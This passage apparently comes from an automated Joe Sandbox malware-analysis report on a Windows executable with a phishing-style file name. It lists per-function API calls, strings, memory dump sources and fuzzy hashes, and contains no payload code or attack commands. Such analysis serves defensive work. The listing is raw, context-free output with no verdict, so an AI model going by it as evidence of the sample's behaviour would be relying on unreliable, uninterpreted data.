                                                        • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 00AADA24
                                                        • ShowWindow.USER32(00000003,00000000), ref: 00AADA43
                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 00AADA68
                                                        • DefDlgProcW.USER32(?,00000005,?,?), ref: 00AADA8B
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                                        • String ID: @U=u
                                                        • API String ID: 1211466189-2594219639
                                                        • Opcode ID: a9c2f69f3a2e73e628c88520f29b7d30d2068cfe9c128c0810adc07d492973d0
                                                        • Instruction ID: c4e9a9ea8feb717b40f9e30313293389d73b3c1d7691be19d4b060e1ad764387
                                                        • Opcode Fuzzy Hash: a9c2f69f3a2e73e628c88520f29b7d30d2068cfe9c128c0810adc07d492973d0
                                                        • Instruction Fuzzy Hash: 00B17B71500216EFDF18CF68C9C57BE7BB1BF06701F088069EC8A9BA95D735A950CB90
                                                        Function 00A22E26 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 186windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetWindowLongW.USER32(?,000000EB), ref: 00A22EAE
                                                          • Part of subcall function 00A21DB3: GetClientRect.USER32(?,?), ref: 00A21DDC
                                                          • Part of subcall function 00A21DB3: GetWindowRect.USER32(?,?), ref: 00A21E1D
                                                          • Part of subcall function 00A21DB3: ScreenToClient.USER32(?,?), ref: 00A21E45
                                                        • GetDC.USER32 ref: 00A5CF82
                                                        • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00A5CF95
                                                        • SelectObject.GDI32(00000000,00000000), ref: 00A5CFA3
                                                        • SelectObject.GDI32(00000000,00000000), ref: 00A5CFB8
                                                        • ReleaseDC.USER32(?,00000000), ref: 00A5CFC0
                                                        • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00A5D04B
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                        • String ID: @U=u$U
                                                        • API String ID: 4009187628-4110099822
                                                        • Opcode ID: a4e303798b4af48987eed3f175309bedb08e7cd84b319f12d8e27cee13ad8fc7
                                                        • Instruction ID: e48a096b07cab3d74e2a05693c22177ce262865b6eb4ca7e484897a35c0ec77d
                                                        • Opcode Fuzzy Hash: a4e303798b4af48987eed3f175309bedb08e7cd84b319f12d8e27cee13ad8fc7
                                                        • Instruction Fuzzy Hash: 8C71B330500205EFCF35DFA8D884AAA7BB6FF49361F144279ED565A1A9C7318C4ADB60
                                                        Function 00A95A45 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • WSAStartup.WSOCK32(00000101,?), ref: 00A95AA6
                                                        • inet_addr.WSOCK32(?,?,?), ref: 00A95AEB
                                                        • gethostbyname.WSOCK32(?), ref: 00A95AF7
                                                        • IcmpCreateFile.IPHLPAPI ref: 00A95B05
                                                        • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00A95B75
                                                        • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00A95B8B
                                                        • IcmpCloseHandle.IPHLPAPI(00000000), ref: 00A95C00
                                                        • WSACleanup.WSOCK32 ref: 00A95C06
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                        • String ID: Ping
                                                        • API String ID: 1028309954-2246546115
                                                        • Opcode ID: 6b71f6fa46254ebc866047c9f4590cf721508cc2267bcb43069f40e5fb6b6143
                                                        • Instruction ID: a46102ae4b3d652e58a2cfda5e28d2675cd35743bbd22f8da3d3b42f9e35906d
                                                        • Opcode Fuzzy Hash: 6b71f6fa46254ebc866047c9f4590cf721508cc2267bcb43069f40e5fb6b6143
                                                        • Instruction Fuzzy Hash: 93519F31A047119FDB11EF78DD4AB2AB7E0EF49710F048929F956DB2A1EB70E801CB45
                                                        Function 00AAC27C Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 149windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00A22612: GetWindowLongW.USER32(?,000000EB), ref: 00A22623
                                                          • Part of subcall function 00A22344: GetCursorPos.USER32(?), ref: 00A22357
                                                          • Part of subcall function 00A22344: ScreenToClient.USER32(00AE67B0,?), ref: 00A22374
                                                          • Part of subcall function 00A22344: GetAsyncKeyState.USER32(00000001), ref: 00A22399
                                                          • Part of subcall function 00A22344: GetAsyncKeyState.USER32(00000002), ref: 00A223A7
                                                        • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?), ref: 00AAC2E4
                                                        • ImageList_EndDrag.COMCTL32 ref: 00AAC2EA
                                                        • ReleaseCapture.USER32 ref: 00AAC2F0
                                                        • SetWindowTextW.USER32(?,00000000), ref: 00AAC39A
                                                        • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00AAC3AD
                                                        • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?), ref: 00AAC48F
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                                        • String ID: @GUI_DRAGFILE$@GUI_DROPID$@U=u
                                                        • API String ID: 1924731296-2104563098
                                                        • Opcode ID: 9a08c215f6d35b9dff7a1dd2bf03e8ed9c7c9bf0092c408cc45525972b21b015
                                                        • Instruction ID: 26e3979151836da18e968129638cccdcdd9ed996395823b4709ae8522f72cf07
                                                        • Opcode Fuzzy Hash: 9a08c215f6d35b9dff7a1dd2bf03e8ed9c7c9bf0092c408cc45525972b21b015
                                                        • Instruction Fuzzy Hash: D251BC70204341AFDB04EF64D996F6E7BE1FB99310F00892DF9918B2E1CB30A945CB52
                                                        Function 00A8B72E Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 98COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetErrorMode.KERNEL32(00000001), ref: 00A8B73B
                                                        • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00A8B7B1
                                                        • GetLastError.KERNEL32 ref: 00A8B7BB
                                                        • SetErrorMode.KERNEL32(00000000,READY), ref: 00A8B828
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: Error$Mode$DiskFreeLastSpace
                                                        • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                        • API String ID: 4194297153-14809454
                                                        • Opcode ID: 80b314539dec0e9a267ccd0eec2b9be118f754f0e615e4cc7e6d39cdd677a5c5
                                                        • Instruction ID: 9714493d3e4ab44bd95fe4dca26af55b210be6c7f2a92bffcae0e94779d61c66
                                                        • Opcode Fuzzy Hash: 80b314539dec0e9a267ccd0eec2b9be118f754f0e615e4cc7e6d39cdd677a5c5
                                                        • Instruction Fuzzy Hash: 5831A435A01205AFDB10FFA8D985ABE7BB4FF55700F10802AF902D7291DB719942C761
                                                        Function 00AA6442 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 95windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • DeleteObject.GDI32(00000000), ref: 00AA645A
                                                        • GetDC.USER32(00000000), ref: 00AA6462
                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00AA646D
                                                        • ReleaseDC.USER32(00000000,00000000), ref: 00AA6479
                                                        • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00AA64B5
                                                        • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00AA64C6
                                                        • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00AA9299,?,?,000000FF,00000000,?,000000FF,?), ref: 00AA6500
                                                        • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00AA6520
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                        • String ID: @U=u
                                                        • API String ID: 3864802216-2594219639
                                                        • Opcode ID: 881fa197034746f4cfaf4da8154e5c6e91892722a6d48d5fa8e03c0e86a73b38
                                                        • Instruction ID: eaa231ba554c8a6b84031a8245d7ffb374e1305e1ecda6b643160bd4bdde8bb1
                                                        • Opcode Fuzzy Hash: 881fa197034746f4cfaf4da8154e5c6e91892722a6d48d5fa8e03c0e86a73b38
                                                        • Instruction Fuzzy Hash: D7316D72601215BFEB158F90CC4AFEA3FA9EF0A761F084065FE089A1D1D7759C42CB64
                                                        Function 00A98BC0 Relevance: 15.3, APIs: 10, Instructions: 324fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • VariantInit.OLEAUT32(?), ref: 00A98BEC
                                                        • CoInitialize.OLE32(00000000), ref: 00A98C19
                                                        • CoUninitialize.OLE32 ref: 00A98C23
                                                        • GetRunningObjectTable.OLE32(00000000,?), ref: 00A98D23
                                                        • SetErrorMode.KERNEL32(00000001,00000029), ref: 00A98E50
                                                        • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,00AB2C0C), ref: 00A98E84
                                                        • CoGetObject.OLE32(?,00000000,00AB2C0C,?), ref: 00A98EA7
                                                        • SetErrorMode.KERNEL32(00000000), ref: 00A98EBA
                                                        • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00A98F3A
                                                        • VariantClear.OLEAUT32(?), ref: 00A98F4A
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                        • String ID:
                                                        • API String ID: 2395222682-0
                                                        • Opcode ID: a873493ec4879c73021e315dff98fa12f1752913695d54c4138c65cf9ae96cc1
                                                        • Instruction ID: 47e00fcf5683c39db4c2f5451ad0391c9beb29c1f1a2b82453d3d0c8f75fcac7
                                                        • Opcode Fuzzy Hash: a873493ec4879c73021e315dff98fa12f1752913695d54c4138c65cf9ae96cc1
                                                        • Instruction Fuzzy Hash: 31C12371208305AFDB04DF68C98492BB7E9BF8A748F00496DF58A9B251DB35ED06CB52
                                                        Function 00A84189 Relevance: 15.1, APIs: 10, Instructions: 108windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • __swprintf.LIBCMT ref: 00A8419D
                                                        • __swprintf.LIBCMT ref: 00A841AA
                                                          • Part of subcall function 00A438D8: __woutput_l.LIBCMT ref: 00A43931
                                                        • FindResourceW.KERNEL32(?,?,0000000E), ref: 00A841D4
                                                        • LoadResource.KERNEL32(?,00000000), ref: 00A841E0
                                                        • LockResource.KERNEL32(00000000), ref: 00A841ED
                                                        • FindResourceW.KERNEL32(?,?,00000003), ref: 00A8420D
                                                        • LoadResource.KERNEL32(?,00000000), ref: 00A8421F
                                                        • SizeofResource.KERNEL32(?,00000000), ref: 00A8422E
                                                        • LockResource.KERNEL32(?), ref: 00A8423A
                                                        • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 00A8429B
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                                                        • String ID:
                                                        • API String ID: 1433390588-0
                                                        • Opcode ID: 3c32298b8d3b9211ac5c05837940aec8abeae464a243c2fdf241dff284334cb0
                                                        • Instruction ID: 4dfe25a9a3e16c414e782ec8a61f31fd7bd660fadc0a5caadb0ca82cd03dea4d
                                                        • Opcode Fuzzy Hash: 3c32298b8d3b9211ac5c05837940aec8abeae464a243c2fdf241dff284334cb0
                                                        • Instruction Fuzzy Hash: 0B31807560921BAFDB15EFA0DD48AFF7BACEF09301F004525F905D6150E730DA629BA0
                                                        Function 00A816DE Relevance: 15.1, APIs: 10, Instructions: 89threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetCurrentThreadId.KERNEL32 ref: 00A81700
                                                        • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00A80778,?,00000001), ref: 00A81714
                                                        • GetWindowThreadProcessId.USER32(00000000), ref: 00A8171B
                                                        • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00A80778,?,00000001), ref: 00A8172A
                                                        • GetWindowThreadProcessId.USER32(?,00000000), ref: 00A8173C
                                                        • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00A80778,?,00000001), ref: 00A81755
                                                        • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00A80778,?,00000001), ref: 00A81767
                                                        • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00A80778,?,00000001), ref: 00A817AC
                                                        • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00A80778,?,00000001), ref: 00A817C1
                                                        • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00A80778,?,00000001), ref: 00A817CC
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                        • String ID:
                                                        • API String ID: 2156557900-0
                                                        • Opcode ID: cd2510e07ed80a32a7dbb0e7cd6920a89799c45e89b7dda94d25a412e5155663
                                                        • Instruction ID: 5e57dadc1da069be4c4fa2a56e57d81c43da4c1844e5f8de04f78b64de72a633
                                                        • Opcode Fuzzy Hash: cd2510e07ed80a32a7dbb0e7cd6920a89799c45e89b7dda94d25a412e5155663
                                                        • Instruction Fuzzy Hash: 6631A975600244AFEB25EFA4EC88F797BEDAB16711F104028F804CA2A0E7B49D43CF60
                                                        Function 00A2FBBD Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 264comCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00A2FC06
                                                        • OleUninitialize.OLE32(?,00000000), ref: 00A2FCA5
                                                        • UnregisterHotKey.USER32(?), ref: 00A2FDFC
                                                        • DestroyWindow.USER32(?), ref: 00A64A00
                                                        • FreeLibrary.KERNEL32(?), ref: 00A64A65
                                                        • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00A64A92
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                        • String ID: close all
                                                        • API String ID: 469580280-3243417748
                                                        • Opcode ID: 1a50b8d9136ee37356f6fdd4e8f1ee19daeaa164bd66946e5a3ce909f80c7c5b
                                                        • Instruction ID: 52f2a647be794be69284b68d59283f1210ec48c3514d75b186cd44196135122c
                                                        • Opcode Fuzzy Hash: 1a50b8d9136ee37356f6fdd4e8f1ee19daeaa164bd66946e5a3ce909f80c7c5b
                                                        • Instruction Fuzzy Hash: B5A18D34701222DFCB29EF58D995A69F774BF18740F1442BDE90AAB261CB30AD16CF54
                                                        Function 00A7A693 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 241COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • EnumChildWindows.USER32(?,00A7AA64), ref: 00A7A9A2
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: ChildEnumWindows
                                                        • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                        • API String ID: 3555792229-1603158881
                                                        • Opcode ID: 0de41823dbb08e92597a6bcad3710d552a4cb5bede52756daf05a54320a11bad
                                                        • Instruction ID: ac55fee4238c3a3e0fd7ac0d7dfd2f62f0b235de2644ba1d5e96cb75469527f0
                                                        • Opcode Fuzzy Hash: 0de41823dbb08e92597a6bcad3710d552a4cb5bede52756daf05a54320a11bad
                                                        • Instruction Fuzzy Hash: 8C919331A00506FADB58DF70C981BEEFB74BF94304F10C129E99EA7151DB30AA59DB91
                                                        Function 00AAB60B Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 199windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • IsWindow.USER32(01776368), ref: 00AAB6A5
                                                        • IsWindowEnabled.USER32(01776368), ref: 00AAB6B1
                                                        • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 00AAB795
                                                        • SendMessageW.USER32(01776368,000000B0,?,?), ref: 00AAB7CC
                                                        • IsDlgButtonChecked.USER32(?,?), ref: 00AAB809
                                                        • GetWindowLongW.USER32(01776368,000000EC), ref: 00AAB82B
                                                        • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00AAB843
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                        • String ID: @U=u
                                                        • API String ID: 4072528602-2594219639
                                                        • Opcode ID: 9fc6a23fcc4aaa41f1bbdacd24e5b4552fee3cb79558975dca994fd756421988
                                                        • Instruction ID: 68f8d8b841a7023aea015e9e8d983718a75010c5d0283859ac24a5256c597bae
                                                        • Opcode Fuzzy Hash: 9fc6a23fcc4aaa41f1bbdacd24e5b4552fee3cb79558975dca994fd756421988
                                                        • Instruction Fuzzy Hash: FB71AC34611244AFDB24DFA4C8E4FBABBB9FF5A340F144469E945972E2C772A841CB60
                                                        Function 00AA6FEF Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 143windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00AA7093
                                                        • SendMessageW.USER32(?,00001036,00000000,?), ref: 00AA70A7
                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00AA70C1
                                                        • _wcscat.LIBCMT ref: 00AA711C
                                                        • SendMessageW.USER32(?,00001057,00000000,?), ref: 00AA7133
                                                        • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00AA7161
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$Window_wcscat
                                                        • String ID: @U=u$SysListView32
                                                        • API String ID: 307300125-1908207174
                                                        • Opcode ID: 7959ee9b88e7ee7d47fff4b2f12d5005f1ce0af8ad83f23335365316aabffe48
                                                        • Instruction ID: a4782aa1865b9de6ec110786133f014ffd6503c9df9080d0b7fba36bdb091205
                                                        • Opcode Fuzzy Hash: 7959ee9b88e7ee7d47fff4b2f12d5005f1ce0af8ad83f23335365316aabffe48
                                                        • Instruction Fuzzy Hash: 08418F71A04348AFDB219FA4CC85BEF77E8EF09350F10092AF545A72D1D7719D858B60
